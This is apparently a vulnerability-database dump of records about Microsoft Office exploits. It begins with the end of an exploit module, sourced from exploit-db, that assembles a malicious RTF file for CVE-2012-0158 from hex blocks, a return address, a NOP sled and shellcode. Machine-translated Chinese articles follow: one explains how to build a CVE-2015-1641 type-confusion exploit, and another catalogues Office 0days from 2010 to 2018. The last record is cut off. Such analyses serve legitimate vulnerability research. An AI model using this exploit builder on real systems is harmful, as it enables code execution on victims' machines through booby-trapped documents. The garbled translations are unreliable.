\"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400\"\r\n\t\tcontent << \"72007900000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628\"\r\n\t\tcontent << \"0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00\"\r\n\t\tcontent << \"49006E0066006F000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000600000000000000\"\r\n\t\tcontent << \"03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000001000000\"\r\n\t\tcontent << \"160000000000000043006F006E00740065006E007400730000000000000000000000000000000000\"\r\n\t\tcontent << \"000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000\"\r\n\t\tcontent << \"0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000\"\r\n\t\tcontent << \"11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\"\r\n\t\tcontent << \"FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000004C00690073007400\"\r\n\t\tcontent << \"56006900650077004100000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600\"\r\n\t\tcontent << \"1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080\"\r\n\t\tcontent << \"05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974\"\r\n\t\tcontent << \"6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000\"\r\n\t\tcontent << \"000000000000\"\r\n\t\tcontent << ret_address\r\n\t\tcontent << \"9090909090909090\"\r\n\t\tcontent << shellcode\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000000000000000000000000000000000000000000000000000000000000000000000\"\r\n\t\tcontent << \"00000000000000\"\r\n\t\tcontent << \"\\n\"\r\n\t\tcontent << \"}\"\r\n\t\tcontent << \"}\"\r\n\t\tcontent << \"}\"\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(content)\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18780/"}], "myhack58": [{"lastseen": "2016-12-03T17:44:02", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2015-1641"], "edition": 1, "description": "This is a period of vulnerability to share with you is CVE-2015-1641 learning summary, this vulnerability due to its good versatility and stability claims to have replaced the CVE-2012-0158 trend. The vulnerability is a type confusion class of vulnerability, through which you can achieve arbitrary address of the memory write data, and then according to vulnerability characteristics, combined with some of the typical use of the technique can achieve arbitrary code execution. \nThe vulnerability principle\nThis vulnerability of the common sample is the rtf Document Format File, this point and below, the exploit about, the main reason is the rtf to facilitate construction using components, of course this is not absolute\u3002 However, the vulnerability principle in fact, and rtf Document Format independent, but with the office open xml document format is implementation dependent. This document format of the common word document, expand the name is docx is actually a use the open xml organizations document internal resources after the zip compression package. In fact, the vulnerability of the rtf sample, generally contains 3 docx format file component, wherein the 2 files used to trigger the vulnerability component, the other as an exp component, still is not an absolute one. \n! [](/Article/UploadPic/2016-12/2016123171529970. png? www. myhack58. com! web) \nThe above 3 zip bag is from the rtf file sample in the extracted, as to how to extract here a simple way, the word document there is an Insert object function, you can insert another word document files, this sample is inserted into the 3 docx documents into it and then the main document is saved as rtf Document Format, then this 3 Insert the docx file object in the main file is a section of a 16-ary data, the corresponding 3 files in the 16-ary coding, so you can by a regular expression using Notepad++like editor from the main file in the extracted 16-ary coding:\u201c\\\\\\objdata [0-9a-f\\r\\n]+\u201d, and then by means of some hex editor such as 010edit Save As 3 docx/zip files. After that you can begin to analyze the vulnerability principle, the first second of the target file remove the zip suffix using the office Open, then the word program will directly crash, and in the debugger you can see the crash point is an assignment statement and ecx for a stable memory address value, \u5176\u6307\u5411\u7684\u8303\u56f4\u662f\u6f0f\u6d1e\u5229\u7528\u4f7f\u7528\u5230\u7684\u4e00\u4e2a\u4e3a\u4e86\u7ed5\u8fc7aslr\u7684\u6a21\u5757msvcr71.dll to: \n! [](/Article/UploadPic/2016-12/2016123171529671. png? www. myhack58. com! web) \nThen from the file point of view, plus the zip suffix decompression is as follows: \n! [](/Article/UploadPic/2016-12/2016123171529361. png? www. myhack58. com! web) \nWherein, the word directory is under the document. the xml for the organization of the documentation resource of primary documents, generally the document's text content is also on the inside, and from this file we can find to trigger this vulnerability the main content: \n! [](/Article/UploadPic/2016-12/2016123171530503. png? www. myhack58. com! web) \nAs can be seen in the debugger that appears in the crash point of the ecx value is directly unicode encoding in the smartTag tag element attribute value inside, and the condition is satisfied in the case msvcr71 module has been previously loaded, The follow-up will be a memory copy, and the copy of the destination address according to ecx calculated a value, and copy the data to 0xffffe696 that sub-label moveFromRange*the ID value 4294960790: the \n! [](/Article/UploadPic/2016-12/2016123171530111. png? www. myhack58. com! web) \nThus, by the file as the configuration of the content, the main control two variable values can be simple to achieve arbitrary memory address of the write data function. Of course, we are also more concerned about a focus on this construct the content of the principles is what? You can see this piece of content is a set of open xml closing tags, the outermost layer is the smartTag label, the innermost layer is moveFromRange*label. Respectively, refer to the msdn documentation of the relevant information, to be aware of these tags in detail, where attention to moveFromRange*label displaceByCustomXml Property description: \n! [](/Article/UploadPic/2016-12/2016123171530291. png? www. myhack58. com! web) \nFrom the above figure it can be seen, the attribute specified is replaced by a custom xml tag elements, in other words understand that is moveFromRange*the label of this attribute specifies the parent tag of a customXml object to be replaced. However, from the sample content we did not see the customXml tags, carefully observed a moment customXml tag, and smartTag label instructions after the discovery, the two Label elements not only function with a certain similarity, the internal property of the structure is also more interesting to keep consistent: \n! [](/Article/UploadPic/2016-12/2016123171530419. png? www. myhack58. com! web) \nCan imagine this on the same template out of the twins tag, is He the founder of Microsoft assigned to different jobs, that sometimes Microsoft's own didn't even recognize who is who. In fact, the type confusion vulnerability it is thus, seen above in the debugger the crash position, that is, the word program parses to moveFromRange*label, prepare the internal id of the transfer to which the parent element smartTag\uff08/customXml object\u201cspace\u201dinside it. By back tracking this process and contrast, if it is a normal case of the higher tag for the customXml, the transfer will be carried out once the memory allocation and then copy it to new memory space; and if it is a confusing case, since both objects the essence of the difference, this time directly to the id value of the transfer to the smartTag object has some internal space, the following two cases of code of the tracking sequence contrast figure: \n! [](/Article/UploadPic/2016-12/2016123171530657. png? www. myhack58. com! web) \nSince the two tags inside the attributes of the members have a certain similarity can lead to type confusion, the syntax through an internal check, but the actual parsing process, the object's internal lack of strict check, cause confusion to the smartTag object, parse moveFromRange*when the tag is considered to replace the need of memory space already exists, on the direct use of the wrong location for the copy process, resulting in this can be utilized the security vulnerability. \nConfigured to trigger the vulnerability POC \nAccording to the above principle, the vulnerability occurs in the scene is the word program in the analysis inside custom xml customXml tags there is a replacement marker case, the original moveFromRange*tag is to the tag id is transmitted to the superior customXml object, however, due to the customXml and its brother label smartTag there is a certain similarity, resulting in the customXml tag is replaced with the smartTag occurs when the type of Confusion caused by memory copy vulnerabilities. The following describes how to construct the trigger this vulnerability POC samples, we first make one thing clear, in order to achieve arbitrary memory address, we need to control the two variables are confused after the smartTag tag of element attribute values and moveFromRange*tag id value, they were controlled to overwrite the memory address and memory data, the reverse track at the above-mentioned point of collapse function: \n\n\n**[1] [[2]](<81759_2.htm>) [[3]](<81759_3.htm>) [next](<81759_2.htm>)**\n", "modified": "2016-12-03T00:00:00", "published": "2016-12-03T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/81759.htm", "id": "MYHACK58:62201681759", "type": "myhack58", "title": "Hand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09-bug warning-the black bar safety net", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-13T15:28:22", "bulletinFamily": "info", "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:21:09", "description": "\u6765\u6e90\uff1a http://drops.wooyun.org/papers/9809\r\n\r\n### Microsoft Office \u5185\u5b58\u635f\u574f\u6f0f\u6d1e\r\n\r\n\r\n### 0x01 \u6f0f\u6d1e\u6982\u8ff0\r\n\r\n\u4eca\u5e744\u6708\u4efd\u5fae\u8f6f\u4fee\u8865\u4e86\u4e00\u4e2a\u540d\u4e3aCVE-2015-1641\u7684word\u7c7b\u578b\u6df7\u6dc6\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u6784\u9020\u5d4c\u5165\u4e86docx\u7684rtf\u6587\u6863\u8fdb\u884c\u653b\u51fb\u3002word\u5728\u89e3\u6790docx\u6587\u6863\u5904\u7406displacedByCustomXML\u5c5e\u6027\u65f6\u672a\u5bf9customXML\u5bf9\u8c61\u8fdb\u884c\u9a8c\u8bc1\uff0c\u53ef\u4ee5\u4f20\u5165\u5176\u4ed6\u6807\u7b7e\u5bf9\u8c61\u8fdb\u884c\u5904\u7406\uff0c\u9020\u6210\u7c7b\u578b\u6df7\u6dc6\uff0c\u5bfc\u81f4\u4efb\u610f\u5185\u5b58\u5199\u5165\uff0c\u6700\u7ec8\u7ecf\u8fc7\u7cbe\u5fc3\u6784\u9020\u7684\u6807\u7b7e\u4ee5\u53ca\u5bf9\u5e94\u7684\u5c5e\u6027\u503c\u53ef\u4ee5\u9020\u6210\u8fdc\u7a0b\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\n\r\n\u6839\u636e\u5fae\u8f6f\u5b98\u65b9MS15-33\u5b89\u5168\u516c\u544a\u91cc\u663e\u793a\uff0c\u8fd9\u4e2a\u6f0f\u6d1e\u8986\u76d6Office 2007 SP3\uff0cOffice 2010 SP2\uff0832\u4f4d\u548c64\u4f4d\uff09\uff0cOffice 2013 SP1\uff0832\u4f4d\u548c64\u4f4d\uff09\uff0cOffice 2013RT SP1\uff0cWord for Mac 2011\u4ee5\u53caOffice\u5728SharePoint\u670d\u52a1\u5668\u4e0a\u7684Office 2010/2013\u548cOffice Web 2010/2013\u5e94\u7528\uff0c\u9664\u6b64\u4e4b\u5916\uff0c\u7ecf\u8fc7\u9a8c\u8bc1Office 2010 SP1\u4e5f\u53d7\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\uff0c\u4f46\u662f\u5fae\u8f6f\u9488\u5bf9\u8be5\u6f0f\u6d1e\u57282010\u4e0a\u7684\u8865\u4e01KB2553428\u5e76\u672a\u63a8\u51faSP1\u7248\u672c\uff0c\u56e0\u6b64SP1\u7248\u672c\u7684Office 2010\u5230\u76ee\u524d\u5373\u4f7f\u66f4\u65b0\u6240\u6709\u8865\u4e01\u4ecd\u7136\u5b58\u5728\u8be5\u6f0f\u6d1e\u3002\r\n\r\nCVE-2015-1641\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u89e6\u53d1\u975e\u5e38\u7a33\u5b9a\uff0c\u51e0\u4e4e\u5f71\u54cd\u5fae\u8f6f\u76ee\u524d\u6240\u652f\u6301\u7684\u6240\u6709office\u7248\u672c\uff08\u6700\u65b0\u63a8\u51fa\u7684Office 2016\u9664\u5916\uff09\uff0c\u5f71\u54cd\u8303\u56f4\u5341\u5206\u5e7f\u6cdb\u3002\u76ee\u524d\u65e0\u8bba\u662f\u5728VirusTotal\u8fd8\u662f\u5728\u91ce\u5916\u6293\u5230\u7684\u6837\u672c\uff0c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u653b\u51fb\u6837\u672c\u5df2\u7ecf\u5f00\u59cb\u9010\u6e10\u589e\u52a0\u3002\u6839\u636e\u4ee5\u4e0a\u539f\u56e0\u53ef\u4ee5\u63a8\u65ad\uff0c\u5728\u4eca\u540e\u5f88\u957f\u7684\u4e00\u6bb5\u65f6\u95f4\u5185\u90fd\u4f1a\u5b58\u5728\u8be5\u6f0f\u6d1e\u7684\u653b\u51fb\uff0c\u5e76\u4e14\u6709\u66ff\u4ee3CVE-2012-0158\u7684\u8d8b\u52bf\u3002\r\n\r\n### 0x02 \u6f0f\u6d1e\u539f\u56e0\u5206\u6790\r\n\r\n\u4f7f\u7528\u963f\u91cc\u8c1b\u542c\u5f15\u64ce\u626b\u63cfRTF\u6587\u6863\uff0c\u89e3\u6790\u51fa\u5176\u4e2d\u7684\u4e00\u4e2aword\u6587\u6863\u7684document.xml\u4e2d\u6709\u5982\u4e0b\u4ee3\u7801\uff0c\u5305\u542b\u4e864\u4e2asmartTag\u6807\u7b7e\uff0c\u6bcf\u4e2asmartTag\u4e2d\u53c8\u6709permStart\u6807\u7b7e\uff0c\u800c\u5728permStart\u6807\u7b7e\u4e2d\u7684\u5219\u662f\u5e26\u6709displacedByCustomXml\u5c5e\u6027\u7684moveFromRangeStart\u548cmoveFromRangeEnd\u6807\u7b7e\uff1a\r\n\r\n\r\n\r\n\u9996\u5148\u6765\u8bf4\u660e\u4e00\u4e0b\u51e0\u4e2a\u6807\u7b7e\u53ca\u5c5e\u6027\u7684\u4f5c\u7528\u3002smartTag\u6807\u7b7e\u662f\u7528\u4e8eword\u548cexcel\u4e2d\u7684\u667a\u80fd\u6807\u7b7e\uff0c\u9488\u5bf9\u4eba\u540d\u3001\u65e5\u671f\u3001\u65f6\u95f4\u3001\u5730\u5740\u3001\u7535\u8bdd\u53f7\u7801\u7b49\u8fdb\u884c\u667a\u80fd\u8bc6\u522b\u5e76\u5141\u8bb8\u7528\u6237\u6267\u884c\u7279\u5b9a\u64cd\u4f5c\u7684\u6807\u7b7e\u3002\u6bd4\u5982\u5982\u679cSteve 